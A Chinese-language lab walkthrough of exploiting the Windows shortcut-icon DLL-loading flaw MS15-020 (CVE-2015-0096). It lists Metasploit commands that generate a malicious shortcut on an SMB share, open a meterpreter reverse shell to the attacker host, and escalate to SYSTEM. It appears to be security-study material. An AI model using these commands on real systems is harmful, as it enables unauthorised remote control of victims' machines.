名稱:Microsoft DLL植入遠程代碼執行漏洞(CVE-2015-0096)(MS15-020)
了解:Microsoft Windows沒有正確處理DLL文件的加載,存在遠程代碼執行漏洞,通過誘使用戶打開遠程WebDAV或SMB共享上的某些文件利用此漏洞,
成功利用后可導致加載任意庫。Windows使用.lnk來定義文件或者目錄的快捷方式,可以使用.CPL文件來自定義圖標。問題是,在Windows中,圖標從模塊(或者可執行文件或動態鏈接庫)加載。
事實上,.cpl文件實際上是DLL文件。因為攻擊者可以定義哪些可執行模塊會被加載,攻擊者可以利用.LNK文件來執行任意代碼。
實驗環境:
共享主機win7:192.168.1.3
入侵主機linux:192.168.1.7
受害者主機XP:192.168.10
打開終端輸入命令:
msfconsole //啟動msf(metasploit framework)
search ms15 //搜索關鍵字相關漏洞
use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader //漏洞利用模塊
info //查看漏洞相關信息
set payload windows/meterpreter/reverse_tcp //設置一個反彈shell
設置好參數,設置漏洞利用模塊列表的UNCHOST和UNCSHARE
set UNCHOST 192.168.1.3 //我設置為我的另一台主機地址 就是你開着共享那台機器的地址
set UNCSHARE share //設置共享文件的文件夾 這里主機192.168.1.3在C盤下的share里文件夾開啟了共享 提前創建好共享
set LHOST 192.168.1.7 //設置漏洞成功利用后后門連接的地址
exploit //執行漏洞
exploit后會發現生成了幾個文件,
我們去生成的目錄下把文件拷貝到共享主機的共享文件夾下
復制到共享主機后,在啟動MSF進行配置剛才的后門進行監聽...輸入命令
1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST 192.168.1.7
4. exploit
受害者訪問共享后,
成功了觸發了漏洞
可以發現入侵者這邊彈回來了一個回話session 1,簡單點說就是一個后門,這里我順便提了下權,可以看見system權限。
實驗結束,下班,關門,回家。